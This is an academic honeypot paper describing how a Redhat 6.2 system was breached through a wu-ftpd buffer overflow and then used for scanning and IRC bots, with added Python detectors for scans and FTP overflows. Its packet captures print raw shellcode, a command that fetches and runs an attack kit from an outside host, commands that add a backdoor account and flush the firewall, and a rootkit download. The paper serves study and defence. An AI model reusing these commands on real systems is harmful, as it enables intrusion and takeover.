Abstract
A honeypot is an emerging technology in computer security. Any networked computer attracts hackers who intentionally try to gain unauthorized access to it. A honeypot system is meant to be hacked in order to learn from the intrusion, or merely to serve as a deception mechanism. In this research, we deployed several sets of honeynet architecture consisting of several operating systems as high interaction honeypots, connected to the internet via a TMNet Streamyx Home DSL connection and monitored by a monitoring station running Snort IDS. Among all the high interaction honeypots deployed, the Redhat 6.2 honeypot is one of the most interesting, because it was successfully penetrated by a hacker who then abused it to launch attacks against other hosts. The honeypot was also used as a bot server for several IRC channels. This paper discusses the details of the hacker's activity within the deployed honeypot.
Keywords: high interaction honeypot, honeynet, buffer overflow in Redhat 6.2
the data control (firewall) system. Removing the data control requires the honeypot operator to monitor their honeypot from time to time to avoid abuse. But the removal of the data control eliminates the possibility of the monitoring station generating any traffic that could alert any attacker about its presence.
[Figure: honeynet architecture. Internet -> Ethernet hub -> Honeypot, plus a sniffer server for monitoring/analysis (labels: Windows XP, Registry Modified, No IP) running Snort (IDS), Ethereal (network packet collector), MySQL (alert database) and ACID (data interpreter).]
The network traffic is collected by ethereal. The network traffic saved by ethereal is in the standard tcpdump format. Tcpdump is the de facto format to store network traffic [5].

To simplify detection, an IDS is installed. Snort IDS is chosen as the IDS software for this setup. Snort is a lightweight network intrusion detection system developed by Martin Roesch. It is based on the libpcap packet capture library commonly used in many TCP/IP sniffers and analyzers. Snort is a rule-based network IDS. Snort rules consist of known attack
as long as possible to get more accurate data. However, the setup may stop due to certain reasons such as blackouts, internet service downtime by the ISP, and abuse by attackers.

The data collection process begins as soon as the setup is connected to the internet. Any network traffic into and from the honeypot is recorded in tcpdump format by ethereal. Simultaneously, the process of identifying possible intrusions is done by the snort IDS software. Any attack detected is logged and written to the mySQL database. Other than these two data collection processes, the forensic analysis of the compromised honeypot will also contribute to the

Table 1: Duration of honeypot uptime

Honeypot     Start Date   Stop Date    Length   IP assigned
Redhat 6.2   2003-12-19   2003-12-23   4 days   219.95.189.49

Redhat 6.2 is the 3rd honeypot and the shortest running one, with 4 days from 2003-12-19 until 2003-12-23. As stated in the methodology, the honeypot is connected to the DSL connection uninterrupted for as long as possible in order to get the most data (which results in a more accurate statistic) unless stopped for some reason. In this case, the Redhat 6.2 honeypot was immediately stopped after we detected that it was being used as a stepping stone to do reconnaissance activity (port scanning).
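The outbound reconnaissance that made the operators stop the honeypot can be spotted directly in the tcpdump text that ethereal saves. The following is an added example, not code from the paper: it assumes tcpdump's text layout ("HH:MM:SS.usec IP src.port > dst.port: Flags [S], ...") and the honeypot address from Table 1, and counts bare outbound SYNs per destination port across distinct hosts; the capture lines are constructed sample data.

```python
import re
from collections import defaultdict

# Assumption: the honeypot's address from Table 1; change it for another deployment.
HONEYPOT_IP = "219.95.189.49"

# Assumed tcpdump text layout, e.g.
# "12:40:01.000001 IP 219.95.189.49.1034 > 10.1.2.3.21: Flags [S], seq 1, win 512"
LINE_RE = re.compile(
    r"^\d{2}:\d{2}:\d{2}\.\d+ IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

def outbound_syn_targets(lines, honeypot_ip=HONEYPOT_IP):
    """Map each destination port to the set of hosts the honeypot sent a bare SYN to."""
    targets = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["src"] != honeypot_ip:
            continue                 # inbound traffic, or a line in another layout
        if m["flags"] != "S":        # "S." is a SYN-ACK: the honeypot answering as a server
            continue
        targets[int(m["dport"])].add(m["dst"])
    return targets

def scan_alerts(lines, honeypot_ip=HONEYPOT_IP, min_hosts=5):
    """Ports the honeypot probed on at least min_hosts distinct hosts.
    A server that suddenly opens one service port on many hosts is the
    stepping-stone reconnaissance pattern described in the text."""
    return {port: len(hosts)
            for port, hosts in outbound_syn_targets(lines, honeypot_ip).items()
            if len(hosts) >= min_hosts}

# Constructed sample capture (not real data): six FTP probes to distinct hosts,
# one IRC connection, one inbound connection and the honeypot's SYN-ACK reply to it.
SAMPLE_CAPTURE = [
    "12:40:%02d.000000 IP 219.95.189.49.%d > 10.1.2.%d.21: Flags [S], seq 1, win 512"
    % (i, 1030 + i, i) for i in range(1, 7)
] + [
    "12:41:00.000000 IP 219.95.189.49.1040 > 10.9.9.9.6667: Flags [S], seq 1, win 512",
    "12:41:01.000000 IP 10.5.5.5.40000 > 219.95.189.49.21: Flags [S], seq 1, win 512",
    "12:41:01.000100 IP 219.95.189.49.21 > 10.5.5.5.40000: Flags [S.], seq 1, ack 2, win 512",
]

if __name__ == "__main__":
    for port, n in scan_alerts(SAMPLE_CAPTURE).items():
        print("ALERT: honeypot probed port %d on %d distinct hosts" % (port, n))
```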
5. REDHAT 6.2 HACKER'S ATTACK OBSERVATION AND DESCRIPTION

5.1. Overview

The Redhat 6.2 honeypot was hacked within the first day. The attacker entered the server using a buffer overflow technique against the wu-ftp server version 2.6.0. After successfully adding a username and installing a rootkit (a set of programs that replace the most common system programs in favour of the attacker and automatically erase log files to hide his presence), the attacker used the honeypot as his base to launch several attacks and reconnaissance activities. These included actively scanning the internet to find vulnerable ftp servers, launching IRC bot servers, and broadscan smurf attacks. The complete activity is profiled in the attack description section.

5.2. Supporting data

The next table shows partial data extracted from the tcpdump file, showing how the attacker gained entry into the server via the ftp server buffer overflow. The data was captured using ethereal, as the attacker used clear text protocols (ftp, telnet, irc) for the intrusion and abuse processes. The least important data was snipped (shown as "(snipped)") as the whole data set is too long. Some explanations are provided on the sideline.
PASS mozilla@
[Sideline: Buffer overflow - Flooding the]
tQ
-____P‰áj_X‰ÂÍ€ë_1Û÷ãþÊYj_XÍ€ë_èíÿÿÿ: File name too long.
CWD ~/{.,.,.,.}
(snipped)
CWD ~{
sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±_hÿ../Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€ncftpget -u xlogicus -p dupa16ani 206.253.222.88 .
'xlogic.tgz';tar zxvf xlogic.tgz;cd xl;./install;
w
12:37am up 2 days, 16:17, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - Fri 8am 2days 0.43s 0.33s -bash
/usr/sbin/adduser raul
passwd raul
a
a
Changing password for user raul
passwd: all authentication tokens updated successfully
[Sideline: firewall rules]
/sbin/ipchains -F
/sbin/iptables -F
The next data extracted with ethereal shows telnet communication initiated after the previous entry. This telnet session shows the attacker downloading a rootkit from a geocities ftp account and then installing the rootkit.

ftp -v 66.218.65.72
Connected to 66.218.65.72.
220-Welcome to the Yahoo! Web Hosting FTP server.
220-http://help.yahoo.com/help/us/webhosting/gftp/
220-
[Sideline: Connecting to server containing rootkit]
Using binary mode to transfer files.
(snipped)
Retrieve file ---> RETR raul.tgz
150 Opening BINARY mode data connection for /r0bb1_sev/raul.tgz (438592 bytes).
(snipped)
./setu./setpup
(snipped)
[0m
[0;32mStarting Rootkit Instalation .... [0m
[1;31mMakeing Home Directory And Copying Programs ... [0m
[0;32msniffer ... [0m
[0;32mcuratare ... [0m
[1;31mDone With Directorys & Programs ... [0m
[1;31mRemoveing Original Files ... [0m
[1;31mAnd Replaceing With Ours ... [0m
ls: /usr/bin/socklist: No such file or directory
[Sideline: Rootkit installation process]
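The ftp capture above carries detectable markers on the clear-text control channel: CWD arguments with "~{" glob braces, a run of non-printable bytes where a path should be, and shell syntax after the payload. The following is an added example, not code from the paper: an inspector for a client-to-server FTP command stream that reports those markers, run over a constructed session modelled on the capture (the 255-byte argument ceiling and the 0x80..0x8f byte run standing in for the payload are assumptions).

```python
import re

# Pattern from the capture: wu-ftpd 2.6.0's glob handling is reached through
# CWD arguments such as "~/{.,.,.,.}" and "~{", which legitimate clients do not send.
GLOB_RE = re.compile(rb"~/?\{")
# Control-channel commands are ASCII; anything else is binary pushed into the server.
NONPRINT_RE = re.compile(rb"[^\x20-\x7e]")
MAX_ARG_LEN = 255  # assumed path-length ceiling; tune to the servers being watched

def inspect_ftp_command(line: bytes):
    """Return the reasons one FTP command looks like the overflow attempt (empty list if clean)."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    reasons = []
    if verb.upper() == b"CWD" and GLOB_RE.search(arg):
        reasons.append("glob braces in CWD argument")
    if NONPRINT_RE.search(arg):
        reasons.append("non-printable bytes in argument")
    if len(arg) > MAX_ARG_LEN:
        reasons.append("argument longer than %d bytes" % MAX_ARG_LEN)
    if b";" in arg or b"/bin/sh" in arg:
        reasons.append("shell command syntax in argument")
    return reasons

def inspect_session(lines):
    """(line index, verb, reasons) for every suspicious command in a client-to-server stream."""
    hits = []
    for i, line in enumerate(lines):
        reasons = inspect_ftp_command(line)
        if reasons:
            hits.append((i, line.split(b" ", 1)[0].decode("ascii", "replace"), reasons))
    return hits

# Constructed client stream modelled on the capture; the 0x80..0x8f run stands in for the payload.
SAMPLE_SESSION = [
    b"USER ftp\r\n",
    b"PASS mozilla@\r\n",
    b"CWD /pub\r\n",
    b"CWD ~/{.,.,.,.}\r\n",
    b"CWD ~{" + bytes(range(0x80, 0x90)) + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for idx, verb, reasons in inspect_session(SAMPLE_SESSION):
        print("line %d %s: %s" % (idx, verb, "; ".join(reasons)))
```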
It is also interesting that the honeypot was used as an IRC bot server. The bot joined several channels like #NovaMusic, #sock, #socklist, #selekt and many more. The data shows irc communication in several channels. The language of the communication is unknown but is believed to be Romanian, as searching the web with the irc communication phrases returns several Romanian sites. The data in the appendix shows the initial connection and the communication recorded over the bot's connection to the IRC server.

:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :de unde sa am mah
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic ::)
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :parca nu stii
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :16 are
:ryz!~ryz@ryz.users.undernet.org PRIVMSG #Reject : ACTION m-a ferit de foc si apa am s-o iubesc viata toata m-a ferit de ce a
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :lasama sa vb cu Stere-
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :loool
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :are multi ma Stere-
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic ::))
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :stai asa ca`ti zic yo cati are
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :ll
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :lol
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :nexa
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :lolz
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :ba nexa
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :ce esti bulangiu
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :da FrIZz
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :zi adevaru ca am 1 2 sau 3
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :lol
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :asa sunt yo ma
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :nu nu
5.3. Other Observations

5.3.1. Detection

Initial detection was through SNORT and the extensive outbound connections initiated from the honeypot. However, the analysis concentrates on the network packets collected by ethereal in tcpdump format, as all the attacker's activities are recorded there. Most data is extracted via ethereal.

5.3.2. Source of attack

The IP initially used in the attack is 203.197.136.8. A query at APNIC shows that the IP address belongs to an ISP in India. The next source IP, which the attacker used to log in with the telnet program, is 213.233.97.236. The search shows that this IP belongs to an ISP in Romania. This further supports the theory that the attacker uses several bases all over the world as launch pads to cover his tracks and preserve his anonymity. Intruders usually keep several computers under their control, called step-through hosts, from which they access other computers [7].

5.3.3. Evidence of Active Targeting

As the attacker used only ftp related exploits to gain entry, coupled with the fact that the honeypot runs an ftp server, this shows active targeting. Furthermore, the honeypot then sent an email stating the honeypot's information to the hacker's email address.

6. HACKING TO ABUSE PROCESSES DISCUSSION

Figure 3 shows the summary of the Redhat 6.2 hacking towards abuse processes.

6.1. Reconnaissance/Scanning, Gaining Access, Escalating Privileges & Covering Tracks

The source sends a TCP SYN scan to determine whether the targeted host runs a vulnerable FTP server (like ours). It then buffer overflows the server, installs a script downloaded from 206.253.222.88 and adds the user name raul to the system. The source of the attack is a computer in India (based on the source IP). From the speed of the overall initial process, it is believed that the attacker used automated tools for scanning and gaining the first entrance.

A few hours later, the attacker logs in (from a computer in Romania) over the telnet protocol with the username that his tool previously created for him (which enables us to monitor his activity, since telnet is a clear text protocol). After that the attacker downloads and installs a rootkit from a paid webhosting account with Yahoo. It is not known to whom this account belongs, as there is some possibility that the account is stolen (the researchers' attempt to access the account with the same username and password a few days later failed). The rootkit replaced most system files and deleted log files to ensure its invisibility.

7. CONCLUSION

The Redhat 6.2 honeypot was hacked within its first day online. Even though Redhat 6.2 is an outdated operating system, the danger is not limited to the OS alone [13]. It is shown that attackers will exploit vulnerable software to gain entry to their target host. The only reason they still used an old exploit is because it still worked (which means old systems with known vulnerabilities still exist). Firewall implementation can help to eradicate unwanted traffic. Users must always update their systems and disable any services that they do not need.